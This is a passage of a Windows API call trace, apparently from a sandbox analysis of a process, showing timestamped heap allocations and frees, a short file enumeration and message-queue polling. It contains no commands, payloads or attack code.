hHeap=0x660000) returned 1 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228d28 | out: hHeap=0x660000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0061.268] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228d28 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228eb8 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228d28 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0061.269] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0061.269] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0061.269] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.269] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 